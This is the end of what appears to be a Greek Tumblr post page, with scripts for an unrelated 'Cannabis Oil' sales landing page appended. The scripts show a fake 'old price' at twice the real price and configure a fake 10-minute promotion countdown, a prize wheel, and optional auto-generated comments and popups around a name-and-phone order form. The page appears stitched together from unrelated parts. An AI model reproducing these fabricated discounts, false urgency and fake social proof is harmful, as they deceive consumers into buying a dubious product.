                <section class="panel">
                  <section class="inline-meta date-notes">
                    <div class="date-note-wrapper">
                      <a class="meta-item post-date lt50" href="" title="21 hours ago">3η Δεκεμβρίου 2019</a>
                    </div>
                  </section>
                  <section class="post-controls">
                    <div class="controls-wrapper">
                      <div class="control share-control">
                        <nav class="pop">
                          <a class="share selector" href=""></a>
                          <div class="pop-menu share-menu south" id="share_189449602542">
                            <ul>
                              <li class="open-in-app">
                                <a class="share-item open-in-app lt51" data-post="189449602542" href="">Άνοιγμα σε εφαρμογή</a>
                              </li>
                              <li>
                                <a class="share-item facebook lt52" href="" target="_blank">Facebook</a>
                              </li>
                              <li>
                                <a class="share-item twitter lt53" href="" target="_blank">Tweet</a>
                              </li>
                              <li>
                                <a class="share-item reddit lt54" href="" target="_blank">Reddit</a>
                              </li>
                              <li>
                                <a class="share-item mail lt55" href="">Αλληλογραφία</a>
                              </li>
                              <li>
                                <a class="share-item permalink lt56" href="">Ενσωμάτωση</a>
                              </li>
                              <li>
                                <a class="share-item permalink lt57" href="">Permalink <i class=" arrow "> </i></a>
                              </li>
                            </ul>
                          </div>
                        </nav>
                      </div>
                      <div class="control reblog-control">
                        <a class="reblog_button" href="" style="display: block;width:24px;height:24px;"><svg height="100%" viewBox="0 0 21 21" width="100%" xmlns="http://www.w3.org/2000/svg">
                        <path d="M5.01092527,5.99908429 L16.0088498,5.99908429 L16.136,9.508 L20.836,4.752 L16.136,0.083 L16.1360004,3.01110845 L2.09985349,3.01110845 C1.50585349,3.01110845 0.979248041,3.44726568 0.979248041,4.45007306 L0.979248041,10.9999998 L3.98376463,8.30993634 L3.98376463,6.89801007 C3.98376463,6.20867902 4.71892527,5.99908429 5.01092527,5.99908429 Z"></path>
                        <path d="M17.1420002,13.2800293 C17.1420002,13.5720293 17.022957,14.0490723 16.730957,14.0490723 L4.92919922,14.0490723 L4.92919922,11 L0.5,15.806 L4.92919922,20.5103758 L5.00469971,16.9990234 L18.9700928,16.9990234 C19.5640928,16.9990234 19.9453125,16.4010001 19.9453125,15.8060001 L19.9453125,9.5324707 L17.142,12.203"></path></svg></a>
                      </div>
                      <div class="control like-control">
                        <div class="like_button" data-blog-name="annacoffeelover" data-post-id="189449602542" id="like_button_189449602542"></div>
                      </div>
                    </div>
                  </section>
                </section>
                <section class="inline-meta date-notes"></section>
              </footer>
            </section>
          </div>
        </article>
      </div><!-- .main -->
      <div class="sidebar"></div><!-- .sidebar -->
    </div><!-- .container -->
  </section>
  <footer class="content clearfix" id="footer"></footer>
</section>

<style class="lt58">
.tmblr-iframe.tmblr-iframe--follow-teaser.open {display: none !important;opacity: 0 !important;width: 0;height: 0;position: absolute;left: -10000px;}
</style>
<script>
    const offer_params = {
        priceMain : '39',
        customPriceOld: '',//вказуєм свою стару ціну якщо не підходить звичайна ціна *2
        currencyMain: '€',
        productName : 'Cannabis Oil',
    };


    var productName = document.getElementsByClassName("productName");
    var priceMain = document.getElementsByClassName("priceMain");
    var priceOld = document.getElementsByClassName("priceOld");
    var currencyMain = document.getElementsByClassName("currencyMain");


    for (var i = 0; i < productName.length; i++) {
        productName[i].innerHTML = offer_params.productName;
    }
    for (var i = 0; i < priceMain.length; i++) {
        priceMain[i].innerHTML = offer_params.priceMain;
    }


    if(offer_params.customPriceOld){
        for (var i = 0; i < priceOld.length; i++) {
            priceOld[i].innerHTML = offer_params.customPriceOld;
        }
    }else{
        for (var i = 0; i < priceOld.length; i++) {
            priceOld[i].innerHTML = offer_params.priceMain * 2;
        }
    }


    for (var i = 0; i < currencyMain.length; i++) {
        currencyMain[i].innerHTML = offer_params.currencyMain;
    }
</script>


<script>
    var usr = '{t2}';
    var sabss = '{clickid}';
    initFeatures({
        priceMain : offer_params.priceMain,
        currencyMain : offer_params.currencyMain,
        lang : 'gr', // список языков - vn, it, es, co, hr, en, de, fr, ph, cz, id, th, gr, bg, al, ro, sg, en_sg, mk, si, sk, lv, hu, pl, lt, pt
        product : offer_params.productName, // название продукта
        genderTargetting : 'all', // пол целевой аудитории - all, male, female
        form : {
            isNeeded : 1, // 1-включить форму, 0-выключить
            img: 'prod.png', // путь до картинки продукта
            price: true, // плашка с ценой
            priceBrFix: true, // фиксит отображение цен в ценике (true - уберает перенос строки)
            showSelect: false, // показывать или скрывать поле select
            untilExpire: 600 // таймер окончания акции где 600 = 10мин. Ставим 0 если таймер не нужен.
        },
        autoComments: {
            isNeeded: 0, // 1-включить автокомы, 0-выключить
            bgColor: '#d7f2d8' // цвет фона блока комчиков
        },
        popups: {
            isNeeded: 0, // 1-включить попы, 0-выключить
            bgColor: 'rgba(87, 86, 141, 0.8)', // цвет фона сообщения
            textColor: '#fff', // цвет основного текста сообщения
            emphColor: 'cyan', // цвет выделений в сообщениях (например, 'со скидкой XX%', '' )
            blackIcons: false // черные или белые иконки, значения true или false
        },
        wheel: {
            isNeeded: 1, // 1-включить колесо, 0-выключить
            customWheel: false // ссылка на свое колесо, либо false
        }
    });
</script>
<script>
    $('[name="name"]').on('input change', function () {
        var val = $(this).val();
        $(this).val(val.replace(/[0-9+]/g, ''));
    });
    $('[name="name"]').attr('autocomplete', 'name');
    $('[name="name"]').attr('pattern', '.{2,25}');
    $('[name="phone"]').on('input change', function (e) {
        var val = $(this).val();
        $(this).val(val.replace(/[A-zА-яіїЁё ]/g, ''));
    });
    $('[name="phone"]').get(0).type = 'tel';
    $('[name="phone"]').attr('autocomplete', 'tel');
    $('[name="phone"]').attr('pattern', '.{6,18}')
</script>
</body></html>
